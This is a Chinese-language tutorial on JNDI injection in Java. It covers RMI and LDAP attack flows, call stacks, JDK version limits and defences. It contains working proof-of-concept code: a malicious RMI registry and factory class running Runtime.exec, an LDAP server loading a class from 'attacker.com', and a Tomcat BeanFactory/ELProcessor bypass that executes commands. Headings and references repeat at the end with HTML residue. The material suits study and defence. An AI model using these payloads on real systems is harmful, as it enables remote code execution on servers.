JNDI注入攻击原理与防御详解<\/h1>

1. JNDI基础概念<\/h2>
JNDI（Java Naming and Directory Interface）是用于目录服务的Java API，它允许Java客户端通过名称发现和查找数据和资源（以Java对象的形式）。JNDI独立于底层实现，并指定了一个服务提供者接口(SPI)，允许将目录服务实现插入到框架中。<\/p>

2. JNDI注入原理<\/h2>
JNDI注入的核心在于当JNDI接口在初始化时（如`InitialContext.lookup(URI)<\/code>），如果URI参数可控，攻击者就可能利用这一特性实施攻击。<\/p>`

3. 通过RMI的JNDI注入<\/h2>
3.1 攻击流程<\/h3>

攻击者构造恶意RMI服务器<\/li>
服务器向客户端返回一个Reference对象<\/li>
Reference对象指定从远程加载构造的恶意Factory类<\/li>
客户端在lookup时从远程动态加载并实例化恶意Factory类<\/li>
<\/ol>
3.2 关键代码<\/h3>
\/\/ 服务端代码
<\/span><\/span><\/span><\/span>Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>7777<\/span>);<\/span>
<\/span><\/span>Reference reference =<\/span> new<\/span> Reference(<\/span>"test"<\/span>,<\/span> "test"<\/span>,<\/span> "http:\/\/localhost\/"<\/span>);<\/span>
<\/span><\/span>ReferenceWrapper wrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>reference);<\/span>
<\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"calc"<\/span>,<\/span> wrapper);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 恶意类
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> test<\/span>{<\/span>
<\/span><\/span>    public<\/span> test<\/span>()<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 客户端触发
<\/span><\/span><\/span><\/span>new<\/span> InitialContext().<\/span>lookup<\/span>(<\/span>"rmi:\/\/127.0.0.1:7777\/calc"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3.3 调用栈分析<\/h3>

NamingManager.getObjectFactoryFromReference<\/code><\/li>
NamingManager.getObjectInstance<\/code><\/li>
RegistryContext.decodeObject<\/code><\/li>
RegistryContext.lookup<\/code><\/li>
GenericURLContext.lookup<\/code><\/li>
InitialContext.lookup<\/code><\/li>
<\/ol>
3.4 关键点<\/h3>
Reference<\/code>构造方法参数：<\/p>

className<\/code> - 远程加载时使用的类名<\/li>
factory<\/code> - 需要实例化的类名<\/li>
factoryLocation<\/code> - 提供classes数据的地址（支持file\/ftp\/http等协议）<\/li>
<\/ul>
4. 通过LDAP的JNDI注入<\/h2>
4.1 JDK < 8u191的利用<\/h3>
\/\/ 服务端代码
<\/span><\/span><\/span><\/span>InMemoryDirectoryServerConfig config =<\/span> new<\/span> InMemoryDirectoryServerConfig(<\/span>LDAP_BASE);<\/span>
<\/span><\/span>config.<\/span>addInMemoryOperationInterceptor<\/span>(<\/span>new<\/span> OperationInterceptor(<\/span>new<\/span> URL(<\/span>"http:\/\/attacker.com\/#test"<\/span>)));<\/span>
<\/span><\/span>InMemoryDirectoryServer ds =<\/span> new<\/span> InMemoryDirectoryServer(<\/span>config);<\/span>
<\/span><\/span>ds.<\/span>startListening<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 客户端触发
<\/span><\/span><\/span><\/span>new<\/span> InitialContext().<\/span>lookup<\/span>(<\/span>"ldap:\/\/127.0.0.1:6666\/calc"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>4.2 JDK >= 8u191的绕过方法<\/h3>
方法一：通过反序列化<\/h4>
利用条件：客户端存在可用的Gadgets<\/p>
\/\/ 服务端添加序列化数据
<\/span><\/span><\/span><\/span>e.<\/span>addAttribute<\/span>(<\/span>"javaSerializedData"<\/span>,<\/span> GadgetsData);<\/span>
<\/span><\/span><\/code><\/pre>方法二：加载本地类<\/h4>
利用存在于CLASSPATH中的类（如Tomcat中的org.apache.naming.factory.BeanFactory<\/code>）<\/p>
\/\/ 服务端代码
<\/span><\/span><\/span><\/span>ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span>"org.apache.naming.factory.BeanFactory"<\/span>,<\/span>null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"<\/span>));<\/span>
<\/span><\/span>ReferenceWrapper referenceWrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>ref);<\/span>
<\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"Object"<\/span>,<\/span> referenceWrapper);<\/span>
<\/span><\/span><\/code><\/pre>5. 防御机制与限制<\/h2>
5.1 RMI限制<\/h3>
JDK版本限制：<\/p>

6u132<\/li>
7u122<\/li>
8u113<\/li>
<\/ul>
默认设置：

com.sun.jndi.rmi.object.trustURLCodebase = false<\/code><\/p>
5.2 LDAP限制<\/h3>
JDK版本限制：<\/p>

11.0.1<\/li>
8u191<\/li>
7u201<\/li>
6u211<\/li>
<\/ul>
默认设置：

com.sun.jndi.ldap.object.trustURLCodebase = false<\/code><\/p>
6. 防御建议<\/h2>

升级JDK到安全版本<\/li>
避免使用外部可控的JNDI查找<\/li>
设置系统属性限制远程代码加载：
System.<\/span>setProperty<\/span>(<\/span>"com.sun.jndi.rmi.object.trustURLCodebase"<\/span>,<\/span> "false"<\/span>);<\/span>
<\/span><\/span>System.<\/span>setProperty<\/span>(<\/span>"com.sun.jndi.ldap.object.trustURLCodebase"<\/span>,<\/span> "false"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
对用户输入进行严格过滤和验证<\/li>
<\/ol>
7. 参考资源<\/h2>

JNDI Injection: From Theory to Apply<\/a><\/li>
BlackHat: A Journey From JNDI LDAP Manipulation To RCE<\/a><\/li>
Oracle JNDI Documentation<\/a><\/li>
JNDI注入漏洞分析<\/a><\/li>
JNDI注入限制与绕过<\/a><\/li>
<\/ol>

JNDI注入攻击原理与防御详解<\/h1>

2. JNDI注入原理<\/h2> JNDI注入的核心在于当JNDI接口在初始化时（如InitialContext.lookup(URI)<\/code>），如果URI参数可控，攻击者就可能利用这一特性实施攻击。<\/p>

4. 通过LDAP的JNDI注入<\/h2>

4.2 JDK >= 8u191的绕过方法<\/h3>

5. 防御机制与限制<\/h2>

7. 参考资源<\/h2> JNDI Injection: From Theory to Apply<\/a><\/li> BlackHat: A Journey From JNDI LDAP Manipulation To RCE<\/a><\/li> Oracle JNDI Documentation<\/a><\/li> JNDI注入漏洞分析<\/a><\/li> JNDI注入限制与绕过<\/a><\/li> <\/ol>

2. JNDI注入原理<\/h2>
JNDI注入的核心在于当JNDI接口在初始化时（如`InitialContext.lookup(URI)<\/code>），如果URI参数可控，攻击者就可能利用这一特性实施攻击。<\/p>`

7. 参考资源<\/h2>

JNDI Injection: From Theory to Apply<\/a><\/li>
BlackHat: A Journey From JNDI LDAP Manipulation To RCE<\/a><\/li>
Oracle JNDI Documentation<\/a><\/li>
JNDI注入漏洞分析<\/a><\/li>
JNDI注入限制与绕过<\/a><\/li> <\/ol>